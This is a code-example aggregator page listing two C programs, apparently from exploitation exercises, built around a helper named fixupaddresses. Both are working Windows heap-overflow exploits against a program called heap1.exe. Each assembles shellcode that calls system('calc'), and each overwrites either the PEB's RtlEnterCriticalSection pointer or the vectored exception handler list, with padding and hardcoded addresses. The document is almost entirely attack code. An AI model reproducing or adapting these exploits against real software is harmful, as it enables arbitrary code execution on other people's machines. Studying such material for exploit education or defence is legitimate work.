C++ (Cpp) fixupaddresses Exemples

Exemple #1

Fichier : exp_heap1.c Projet : lyyyuna/durian_cake

     int main()
     {
            unsigned char buffer[300]="";
            unsigned char heap[8]="";
            unsigned char pebf[8]="";
            unsigned char shellcode[200]="";
            unsigned int address_of_system = 0;
            unsigned int address_of_RtlEnterCriticalSection = 0;
            unsigned char tmp[8]="";
            unsigned int cnt = 0;

            printf("Getting addresses...\n");
            address_of_system = GetAddress("msvcrt.dll","system");
            address_of_RtlEnterCriticalSection = GetAddress("ntdll.dll","RtlEnterCriticalSection");
            if(address_of_system == 0 || 	address_of_RtlEnterCriticalSection == 0)
                    return printf("Failed to get addresses\n");
            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
            printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);
            strcpy(buffer,"heap1 ");

            // Shellcode - repairs the PEB then calls system("calc");
     strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
            fixupaddresses(tmp,address_of_RtlEnterCriticalSection);
            strcat(buffer,tmp);
          strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
            fixupaddresses(tmp,address_of_system);
            strcat(buffer,tmp);
                    strcat(buffer,"\xFF\xD1");

            // Padding
            while(cnt < 58)
            {
                    strcat(buffer,"DDDD");
                    cnt ++;
            }

            // Pointer to RtlEnterCriticalSection pointer - 4 in PEB
            strcat(buffer,"\x1C\xF0\xFD\x7f");

            // Pointer to heap and thus shellcode
            strcat(buffer,"\x88\x06\x35");

            strcat(buffer,"\"");
            printf("\nExecuting heap1.exe... calc should open.\n");
            system(buffer);
            return 0;
     }

Exemple #2

Fichier : exp2_heap1.c Projet : capturePointer/exploit-2

     int main()
     {
            unsigned char buffer[300]="";
            unsigned char heap[8]="";
            unsigned char pebf[8]="";
            unsigned char shellcode[200]="";
            unsigned int address_of_system = 0;
            unsigned char tmp[8]="";
            unsigned int cnt = 0;

            printf("Getting address of system...\n");

            address_of_system = GetAddress("msvcrt.dll","system");
            if(address_of_system == 0)
                    return printf("Failed to get address.\n");

            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);

            strcpy(buffer,"heap1 ");
     
            while(cnt < 5)
            {
                    strcat(buffer,"\x90\x90\x90\x90");
                    cnt ++;
            }

            // Shellcode to call system("calc");
      strcat(buffer,"\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
            fixupaddresses(tmp,address_of_system);
            strcat(buffer,tmp);
            strcat(buffer,"\xFF\xD1");;

            cnt = 0;
            while(cnt < 58)
            {
                    strcat(buffer,"DDDD");
                    cnt ++;
            }

            // Pointer to 0x77FC3210 - 4. 0x77FC3210 holds
            // the pointer to the first _VECTORED_EXCEPTION_NODE
            // structure. 
            strcat(buffer,"\x0C\x32\xFC\x77");

            // Pointer to our psueudo _VECTORED_EXCEPTION_NODE
            // structure at address 0x0012FF48. This address + 8
            // contains a pointer to our allocated buffer. This
            // is what will be called when the vectored exception
            // handling kicks in. Modify this according to where
            // it can be found on your system
            strcat(buffer,"\x48\xff\x12\x00");

            printf("\nExecuting heap1.exe... calc should open.\n");
            system(buffer);
            return 0;
     }